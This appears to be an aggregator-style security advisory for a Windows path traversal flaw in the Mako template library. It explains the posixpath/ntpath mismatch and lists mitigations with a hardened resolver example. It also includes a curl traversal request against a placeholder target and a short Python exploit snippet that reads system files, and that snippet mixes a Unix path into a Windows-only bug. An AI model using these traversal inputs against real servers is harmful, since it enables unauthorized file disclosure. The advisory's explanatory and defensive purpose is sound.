Mako, Path Traversal, CVE-2026-44307 (High)


How the vulnerability works (CVE-2026-44307):

  1. The root cause is a mismatch between `posixpath` (used for URI normalization in get_template()) and `os.path` (used for file access and validation).
  2. On Windows, `os.path` is ntpath, which treats backslash (\) as a path separator, while `posixpath` treats it as a literal character.
  3. An attacker provides a specially crafted URI containing backslash traversal sequences (e.g., \..\..\secret.txt).
  4. `TemplateLookup.get_template()` strips only leading slashes (/) via `re.sub(r"^\/+", "", uri)` and normalizes the path with posixpath.normpath().
  5. Since `posixpath` treats backslash literally, the traversal sequences (e.g., \..\) are not recognized as path traversal and are passed through unchanged.
  6. The `Template.__init__()` method then validates the URI using os.path.normpath(). On Windows, this resolves `\..\..\secret.txt` to `\secret.txt`.
  7. The resulting string does not start with .., so the `startswith("..")` check passes.
  8. Finally, `os.path.isfile()` on Windows interprets backslash as a path separator, resolving the `..` traversal and locating files outside the configured template directory.
  9. As a result, an attacker can read any readable file on the system, leading to local file disclosure. If the targeted file contains Mako/Python template syntax, it may also be parsed and executed as a template.

DailyCVE Form:

Platform: Windows
Version: < 1.3.11
Vulnerability: Path Traversal
Severity: High
Date: 2026-04-28

Prediction: 2026-05-05

Analytics under What Undercode Say:

Detect vulnerable Mako
pip show mako | grep Version
Simulate path traversal
curl -X GET "http://target/template/\..\..\..\windows\win.ini"

Exploit:

from mako.lookup import TemplateLookup

# Lookup rooted at the configured template directory (vulnerable Mako < 1.3.11 on Windows)
lookup = TemplateLookup(directories=['/templates'])
# Raw string so the backslashes reach Mako literally ("\." and "\p" are invalid string escapes)
uri = r"\..\..\..\etc\passwd"
# posixpath.normpath() leaves the backslashes untouched, so the traversal survives to os.path
template = lookup.get_template(uri)
print(template.render())

Protection from this CVE:

  • Upgrade Mako to version 1.3.11 or later.
  • If upgrading is impossible, normalize backslashes to forward slashes early in the URI processing pipeline.
  • Validate and sanitize all user-supplied template names against an allowlist of permitted template paths.
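As an added illustration (not from the advisory and not Mako's own code) of the posixpath/ntpath mismatch described above and of the first two mitigations in this list: the first three functions replay the two normalization steps on a constructed URI using the standard library's `posixpath` and `ntpath`, so the divergence is visible on any OS, and `safe_template_uri` is a hypothetical hardened resolver that folds backslashes to forward slashes before normalizing and enforces an allowlist.

```python
import ntpath
import posixpath
import re
from collections.abc import Container

# Constructed sample URI of the shape the advisory describes (backslash traversal).
TRAVERSAL_URI = r"\..\..\secret.txt"

def lookup_style_normalize(uri: str) -> str:
    """Mirror the two steps the advisory attributes to get_template():
    strip leading forward slashes, then posixpath.normpath()."""
    uri = re.sub(r"^\/+", "", uri)
    return posixpath.normpath(uri)

def windows_view(uri: str) -> str:
    """What ntpath (os.path on Windows) makes of the same string,
    as in the Template.__init__() validation step."""
    return ntpath.normpath(uri)

def passes_dotdot_check(uri: str) -> bool:
    """The startswith('..') check the advisory says both views slip past."""
    return not uri.startswith("..")

def safe_template_uri(uri: str, allowlist: Container[str]) -> str:
    """Hypothetical hardened handling (added example, not Mako's code): fold
    backslashes into forward slashes BEFORE normalizing, reject any remaining
    '..' component, and require the final name to be on an allowlist."""
    uri = uri.replace("\\", "/")
    uri = re.sub(r"^/+", "", uri)
    norm = posixpath.normpath(uri)
    if ".." in norm.split("/"):
        raise ValueError(f"traversal rejected: {uri!r}")
    if norm not in allowlist:
        raise ValueError(f"not an allowed template: {norm!r}")
    return norm

def is_rejected(uri: str, allowlist: Container[str]) -> bool:
    """True when the hardened resolver refuses the URI."""
    try:
        safe_template_uri(uri, allowlist)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print("posixpath view:", lookup_style_normalize(TRAVERSAL_URI))  # unchanged
    print("ntpath view   :", windows_view(TRAVERSAL_URI))            # \secret.txt
    print("hardened      :", is_rejected(TRAVERSAL_URI, {"index.html"}))
```

Both normalized forms pass the `startswith("..")` check, which is exactly why the check alone is insufficient; normalizing separators first makes the `..` components visible to the same check.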

Impact:

  • Unauthenticated file disclosure outside the intended template directory.
  • Possible remote code execution if the disclosed file contains Mako template syntax.
  • CVSS 4.0 score: 7.7 (High) per NVD.


Sources:

Reported By: github.com